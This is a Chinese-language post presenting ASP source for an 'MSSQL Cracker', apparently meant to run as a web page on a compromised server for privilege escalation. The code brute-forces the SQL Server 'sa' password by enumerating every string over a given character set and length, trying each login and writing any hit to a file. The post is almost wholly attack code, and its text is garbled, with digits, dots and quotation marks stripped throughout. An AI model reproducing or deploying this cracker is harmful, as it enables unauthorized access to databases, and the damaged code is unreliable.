ASP提权暴力破解MSSQL用户密码

一个暴力破解MSSQL用户密码的ASP程序以下这个版本是可以运行之后关闭浏览器运行完毕将在当前目录生成结果文件的

CODE:

<%

============ ASP Port Scanner by lake ===================

×

Version:

For SpringBoard

==========================================================

%>

<style type=text/css>

bodytdth {color: #FF;fontfamily: Verdana Arial Helvetica sansserif;}

body {backgroundcolor: #ffffff;fontsize:px; }

a:link {color: #FF;textdecoration: none;}

a:visited {textdecoration: none;color: #FF;}

a:hover {textdecoration: none;color: #FF;}

a:active {textdecoration: none;color: #FF;}

buttom {color: #FFFFFF; border: px solid #BE; backgroundcolor: #BC}

TextBox {border: px solid #BE}

styleRed {color: #FF}

</style>

<title>MSSQL Cracker for SpringBoard</title>

<%

Dim Password()

If RequestForm(go) <> ″ Then

%>

<div align=center>Welcome to <a href=× target=_blank>×</a> </div>

<form name=form″ method=post action= onSubmit=formSubmitdisabled=true;>

ConnStr:

<input name=conn type=text id=conn value=Provider=SQLOLEDB;Data Source=;User ID=sa;Password={PASS}; size=″>

<br>

Char:

<input name=char type=text id=char value=″ size=″>

<br>

Length:

<input name=len type=text id=len value=″ size=″>

<br>

Path:

<input name=path type=text value=<%=ServerMapPath(rtxt)%> size=″>

<input name=CFile type=checkbox id=CFile value=″ checked>

Enablel<br>

<input name=go type=hidden id=go value=″>

<br>

<input name=Submit type=submit id=Submit value= Run >

</form>

<%

Else

timer = timer

ServerScriptTimeout =

ConnStr = RequestForm(Conn)

Char = requestForm(char)

LenChar = Len(Char)

ReDim password(LenChar)

For i = to LenChar

password(i) = Mid(Char i )

Next

length = CInt(requestForm(len))

Call LAKE()

responseWrite Done!<br>Process & tTime & s

If requestForm(CFile) <> Then CreateResult(Done! & vbcrlf & tTime)

End If

Sub LAKE(str)

If Len(str) >= length Then Exit Sub

For j = to LenChar

pass = str & password(j)

If Len(pass) = length Then Call Crack(pass)

Call LAKE(pass)

Next

End Sub

Sub Crack(str)

On Error Resume Next

Set conn = ServerCreateObject(nnection)

connopen Replace(ConnStr{PASS}str)

If Err Then

If ErrNumber <> Then

responseWrite(ErrDescription & <BR>)

responseEnd()

End If

Else

responseWrite(I Get it ! Password is <font color=red> & str & </font><BR>Process & tTime & s)

If requestForm(CFile) <> Then CreateResult(str & vbcrlf & tTime)

responseEnd()

End If

End Sub

Function tTime()

timer = timer

thetime=cstr(int(timertimer))

tTime = thetime

End Function

Sub CreateResult(t)

Set fs = CreateObject(ScriptingFileSystemObject)

Set outfile = fsCreateTextFile(requestForm(path))

outfileWriteLine t

Set fs = Nothing

End Sub

%>